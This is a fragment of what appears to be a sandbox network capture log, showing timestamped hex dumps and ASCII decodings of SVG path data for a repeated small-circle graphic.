                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3243INData Raw: 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                        Data Ascii: 2,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><pa
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3310INData Raw: 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: ,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3326INData Raw: 37 2e 31 37 2c 32 34 32 2e 36 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32
                                                                                                                                                                                                                                                        Data Ascii: 7.17,242.63a1.72,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.2
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3342INData Raw: 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3358INData Raw: 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c
                                                                                                                                                                                                                                                        Data Ascii: 1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3374INData Raw: 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 30 2e 38 36 2c 32 34 30 2e 34 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39
                                                                                                                                                                                                                                                        Data Ascii: ,1-.16-2.81"/><path class="cls-4" d="M980.86,240.49a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.9
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3390INData Raw: 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 32 36 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d
                                                                                                                                                                                                                                                        Data Ascii: .38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M951.26,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d=
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3406INData Raw: 2d 34 22 20 64 3d 22 4d 39 32 31 2e 34 33 2c 31 32 36 2e 32 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32
                                                                                                                                                                                                                                                        Data Ascii: -4" d="M921.43,126.29a1.7,1.7,0,0,1,.77-2.2,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3422INData Raw: 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 32 34 2c 32 36 33 2e 35 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37
                                                                                                                                                                                                                                                        Data Ascii: 1,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.24,263.56a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3438INData Raw: 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31
                                                                                                                                                                                                                                                        Data Ascii: 2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3454INData Raw: 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 35 2e 38 32 2c 31 34 39 2e 33 36 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                        Data Ascii: ,0,1-.15-2.81"/><path class="cls-4" d="M845.82,149.36a1.68,1.68,0,0,1,.76-2.2,2.47,2.47,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3470INData Raw: 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 36 33 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64
                                                                                                                                                                                                                                                        Data Ascii: 2.36,2.36,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.63,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3486INData Raw: 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c
                                                                                                                                                                                                                                                        Data Ascii: 1a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3585INData Raw: 35 2c 32 33 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                        Data Ascii: 5,237a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3601INData Raw: 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                        Data Ascii: 71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class=
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3617INData Raw: 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 37 38 2c 31 36 35 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35
                                                                                                                                                                                                                                                        Data Ascii: 2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M557.78,165.66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M5
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3633INData Raw: 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 37 35 2c 32 34 31 2e 37 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c
                                                                                                                                                                                                                                                        Data Ascii: .22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M591.75,241.76a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,
